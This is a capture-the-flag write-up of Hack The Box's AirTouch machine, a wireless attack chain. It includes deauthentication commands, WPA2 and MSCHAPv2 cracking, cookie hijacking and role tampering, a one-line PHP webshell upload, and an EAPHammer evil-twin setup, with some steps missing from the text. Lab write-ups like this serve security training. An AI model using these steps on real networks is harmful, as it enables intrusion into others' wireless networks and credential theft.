AirTouch is a medium-difficulty machine from Hack The Box that simulates a multi-AP corporate WiFi environment. We start by leaking the consultant’s SSH password through an open SNMP service, land on a jump host equipped with multiple wireless interfaces, and capture a WPA2-PSK handshake from the AirTouch-Internet network. After cracking the PSK, we associate to the network, sniff decrypted HTTP traffic from the router admin panel, and hijack a session cookie. Tampering the UserRole cookie grants us admin access, where we abuse a file upload to drop a webshell and read credentials reused for SSH on the PSK access point. From there, we pivot to the WPA2-Enterprise AirTouch-Office network using EAPHammer to run an Evil Twin attack against 802.1X, capture a MSCHAPv2 challenge/response, crack it offline, and chain through two more access points to root.
$ nmap -A -Pn 10.129.10.86 Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 23:05 EST Nmap scan report for 10.129.10.86 Host is up (0.35s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA) | 256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA) |_ 256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.19 Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 494.15 ms 10.10.16.1 2 225.16 ms 10.129.10.86
Only SSH on port 22 is exposed via TCP. With nothing else to chew on, we move to UDP enumeration and try SNMP with the default public community string.
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
consultant@AirTouch-Consultant:~$ ls diagram-net.png photo_2023-03-01_22-04-52.png consultant@AirTouch-Consultant:~$
The home directory contains two images. Let’s pull them down for inspection.
The diagram shows the network topology — a consultant box with multiple wireless adapters, an internal AirTouch-Internet PSK access point, an AirTouch-Office enterprise access point, and a photo hinting at the SSIDs we should attack. With wireless interfaces on the host, this is clearly going to be a wireless-pentest box.
Wireless Recon - AirTouch-Internet
We escalate to root (the consultant box has unrestricted sudo) so we can manipulate the wireless interfaces and run airodump-ng to discover nearby APs.
consultant@AirTouch-Consultant:~$ sudo -i root@AirTouch-Consultant:~# aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 wlan0 05:20:09 Waiting for beacon frame (BSSID: F0:9F:C2:A3:F1:A7) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>).
root@AirTouch-Consultant:~# nmap -A -Pn 192.168.3.1 Starting Nmap 7.80 ( https://nmap.org ) at 2026-01-20 05:28 UTC Nmap scan report for 192.168.3.1 Host is up (0.00020s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 53/tcp open domain dnsmasq 2.90 | dns-nsid: |_ bind.version: dnsmasq-2.90 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) | http-title: WiFi Router Configuration |_Requested resource was login.php MAC Address: F0:9F:C2:A3:F1:A7 (Ubiquiti Networks) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/20%OT=22%CT=1%CU=38638%PV=Y%DS=1%DC=D%G=Y%M=F09FC2%T OS:M=696F129C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.20 ms 192.168.3.1
The router exposes a WiFi Router Configuration web app on /login.php. Browsing to it gives us the login page.
![[Pasted image 20260120083110.png]]
We don’t have credentials yet — but we do have the ability to sniff the wireless segment. Since we know the PSK, every frame we capture can be decrypted by Wireshark. Let’s grab a fresh capture with active client traffic in it.
Sniffing Decrypted Traffic
We start a new capture on wlan1 (used in monitor mode) and trigger another deauth so the legitimate client reconnects and starts using the router.
Congratulation! You have logged into password protected page. <a href="index.php">Click here</a> to go to index.php to get the flag.
</body>
</html>
We now have a valid session cookie (PHPSESSID=ctf72095cfdr7iu3ru2blg59jq) and a hint that authorization is decided by the client-controlled UserRole cookie. We replay the cookie in our browser:
![[Pasted image 20260120095627.png]]
Cookie Tampering - Privilege Bypass
We swap UserRole=user to UserRole=admin with Burp:
![[Pasted image 20260120100338.png]]
PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=admin lands us on the admin dashboard, which exposes a file upload feature. We bypass the extension filter by uploading <?php system($_GET["cmd"]);?> saved as .phtml and execute commands.
// Check if user is already logged in if (isset($_SESSION['UserData']['Username'])) { header("Location:index.php"); // Redirect to index.php exit; // Make sure to exit after redirection }
/* Check and assign submitted Username and Password to new variable */ $Username = isset($_POST['Username']) ? $_POST['Username'] : ''; $Password = isset($_POST['Password']) ? $_POST['Password'] : '';
/* Check Username and Password existence in defined array */ if (isset($logins[$Username]) && $logins[$Username]['password'] === $Password) { /* Success: Set session variables and redirect to Protected page */ $_SESSION['UserData']['Username'] = $logins[$Username]['password']; /* Success: Set session variables USERNAME */ $_SESSION['Username'] = $Username;
// Set a cookie with the user's role setcookie('UserRole', $logins[$Username]['role'], time() + (86400 * 30), "/"); // 86400 = 1 day
root@AirTouch-Consultant:~# ssh [email protected] The authenticity of host '192.168.3.1 (192.168.3.1)' can't be established. ECDSA key fingerprint is SHA256:++nw1pytCTTnPb2ngccd1CzlYaYUoTF8GmQ3a3QHnaU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.3.1' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
user@AirTouch-AP-PSK:~$ ls user@AirTouch-AP-PSK:~$ cd user@AirTouch-AP-PSK:~$ ls user@AirTouch-AP-PSK:~$ id uid=1000(user) gid=1000(user) groups=1000(user) user@AirTouch-AP-PSK:~$
We are now sitting on AirTouch-AP-PSK, the PSK access point itself.
Privilege Escalation - PSK AP
sudo -l shows we can run anything with no password. Easy.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
user@AirTouch-AP-PSK:~$ sudo -l Matching Defaults entries for user on AirTouch-AP-PSK: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user may run the following commands on AirTouch-AP-PSK: (ALL) NOPASSWD: ALL user@AirTouch-AP-PSK:~$ user@AirTouch-AP-PSK:~$ sudo su root@AirTouch-AP-PSK:/home/user# cd root@AirTouch-AP-PSK:~# ls certs-backup cronAPs.sh psk send_certs.sh start.sh user.txt wlan_config_aps root@AirTouch-AP-PSK:~# cat user.txt 183ab4d95c2ca8c5864449e56c8d5261 root@AirTouch-AP-PSK:~#
user.txt is ours. While we’re here, let’s check what else lives on this AP — send_certs.sh looks juicy.
# Use sshpass to send the folder via SCP sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "[email protected]:$REMOTE_PATH" root@AirTouch-AP-PSK:~#
Hardcoded credentials for the office AP: remote : xGgWEwqUpfoOVsLeROeG, target 10.10.10.1. To reach that host, we need to be associated to the AirTouch-Office network — which is WPA2-Enterprise (802.1X). Time to escalate the wireless attack.
Targeting AirTouch-Office (WPA2-Enterprise)
The AirTouch-Office SSID uses WPA2-Enterprise (802.1X) instead of a single shared key. Authentication is delegated to a RADIUS server, so each user has their own credentials — typically validated via PEAP-MSCHAPv2.
The classic way to harvest credentials against PEAP is an Evil Twin / Rogue AP: we stand up a malicious access point with the same SSID and signal-shadow the legitimate one with deauth frames. When the victim client roams to our AP, it transparently completes a PEAP exchange with us — handing over a username and an MSCHAPv2 challenge/response that we can crack offline.
The consultant box already has the AirTouch CA / server cert / private key staged in the home directory. We import them into EAPHammer so our rogue AP presents a “trusted-looking” certificate.
Now with more fast travel than a next-gen Bethesda game. >:D
Version: 1.14.0 Codename: Final Frontier Author: @s0lst1c3 Contact: gabriel<<at>>transmitengage.com
[?] Am I root? [*] Checking for rootness... [*] I AM ROOOOOOOOOOOOT [*] Root privs confirmed! 8D Case 1: Import all separate [CW] Ensuring server cert, CA cert, and private key are valid... server.crt server.key ca.crt [CW] Complete! [CW] Loading private key from server.key [CW] Complete! [CW] Loading server cert from server.crt [CW] Complete! [CW] Loading CA certificate chain from ca.crt [CW] Complete! [CW] Constructing full certificate chain with integrated key... [CW] Complete! [CW] Writing private key and full certificate chain to file... [CW] Complete! [CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch CA.pem [CW] Activating full certificate chain... [CW] Complete! root@AirTouch-Consultant:~#
Now with more fast travel than a next-gen Bethesda game. >:D
Version: 1.14.0 Codename: Final Frontier Author: @s0lst1c3 Contact: gabriel<<at>>transmitengage.com
[?] Am I root? [*] Checking for rootness... [*] I AM ROOOOOOOOOOOOT [*] Root privs confirmed! 8D /root/eaphammer/certs/server/AirTouch CA.pem
Subject: Issuer: CN -> AirTouch CA CN -> AirTouch CA C -> ES C -> ES ST -> None ST -> Madrid L -> Madrid L -> Madrid OU -> Server OU -> Certificate Authority emailAddress -> [email protected] emailAddress -> [email protected]
Setting Up the Rogue Infrastructure
We dedicate wlan4 for the deauth flood and wlan3 for hosting the rogue AP, plus a small DHCP server so any associated client gets an IP from us.
1 2 3 4 5 6
consultant@AirTouch-Consultant:~$ sudo iwconfig wlan4 wlan4 IEEE 802.11 Mode:Monitor Frequency:5.22 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on
1 2 3
consultant@AirTouch-Consultant:~$ sudo ip addr add 192.168.99.1/24 dev wlan3 consultant@AirTouch-Consultant:~$ sudo dnsmasq --interface=wlan3 --dhcp-range=192.168.99.50,192.168.99.150,12h --dhcp-option=3,192.168.99.1 --dhcp-option=6,8.8.8.8 -d
We confirm the legitimate AirTouch-Office AP is up and on channel 44 (5 GHz).
$ john -w:/usr/share/wordlists/rockyou.txt ~/hashCommand 'wordlist' not found, did you mean: command 'wordlists' from deb wordlists Try: sudo apt install <deb name> johnjohn -w:/usr/share/wordlists/rockyou.txt ~/hash.txt Warning: detected hash type "netntlm", but the string is also recognized as "netntlm-naive" Use the "--format=netntlm-naive" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status laboratory (r4ulcl) 1g 0:00:00:00 DONE (2026-01-21 00:32) 25.00g/s 2318Kp/s 2318Kc/s 2318KC/s ragde..ivan23 Use the "--show --format=netntlm" options to display all of the cracked passwords reliably Session completed.
r4ulcl : laboratory. Done.
Joining AirTouch-Office
We swap to a PEAP wpa_supplicant profile on wlan1 and DHCP into the office network.
root@AirTouch-Consultant:~# cat office.conf network={ ssid="AirTouch-Office" key_mgmt=WPA-EAP eap=PEAP identity="AirTouch\\r4ulcl" password="laboratory" } root@AirTouch-Consultant:~# wpa_supplicant -i wlan1 -c office.conf -B Successfully initialized wpa_supplicant rfkill: Cannot open RFKILL control device rfkill: Cannot get wiphy information nl80211: Could not set interface 'p2p-dev-wlan1' UP nl80211: deinit ifname=p2p-dev-wlan1 disabled_11b_rates=0 p2p-dev-wlan1: Failed to initialize driver interface P2P: Failed to enable P2P Device interface root@AirTouch-Consultant:~# dhclient wlan1 root@AirTouch-Consultant:~# ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 92:03:9b:e4:f1:fe brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0 valid_lft forever preferred_lft forever 7: wlan0: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff inet 192.168.3.61/24 brd 192.168.3.255 scope global dynamic wlan0 valid_lft 86038sec preferred_lft 86038sec inet6 fe80::ff:fe00:0/64 scope link valid_lft forever preferred_lft forever 8: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff inet 10.10.10.98/24 brd 10.10.10.255 scope global dynamic wlan1 valid_lft 863998sec preferred_lft 863998sec inet6 fe80::ff:fe00:100/64 scope link valid_lft forever preferred_lft forever 9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff 10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN group default qlen 1000 link/ether ac:8b:a9:aa:3f:d2 brd ff:ff:ff:ff:ff:ff inet 192.168.99.1/24 scope global wlan3 valid_lft forever preferred_lft forever 11: wlan4: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000 link/ieee802.11/radiotap 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff 12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff 13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff
wlan1 now has 10.10.10.98/24 — we are inside the office segment with the management AP at 10.10.10.1. Time to use the credentials we lifted from send_certs.sh.
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
remote@AirTouch-AP-MGT:~$ id uid=1000(remote) gid=1000(remote) groups=1000(remote)
Privilege Escalation - Root
We rummage through /etc/hostapd since this is the management AP, and the RADIUS user database for the office network sits right there with an admin user and password.
1 2 3 4 5 6 7
remote@AirTouch-AP-MGT:/etc/hostapd$ cat * | grep -i admin # text file that could be used, e.g., to populate the AP administration UI with # administered bit) "admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2] # text file that could be used, e.g., to populate the AP administration UI with # administered bit) remote@AirTouch-AP-MGT:/etc/hostapd$
That same password works for the local admin account, and admin has unrestricted sudo.
remote@AirTouch-AP-MGT:/etc/hostapd$ su admin Password: To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
admin@AirTouch-AP-MGT:/etc/hostapd$ id uid=1001(admin) gid=1001(admin) groups=1001(admin) admin@AirTouch-AP-MGT:/etc/hostapd$ sudo -l Matching Defaults entries for admin on AirTouch-AP-MGT: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on AirTouch-AP-MGT: (ALL) ALL (ALL) NOPASSWD: ALL admin@AirTouch-AP-MGT:/etc/hostapd$ sudo su root@AirTouch-AP-MGT:/etc/hostapd# cd root@AirTouch-AP-MGT:~# ls certs mgt root.txt start.sh wlan_config_aps root@AirTouch-AP-MGT:~# cat root.txt e651d01aebe45d11022a4e9733e3bd34 root@AirTouch-AP-MGT:~#
And we are root.
That was it for AirTouch, hope you learned something new!
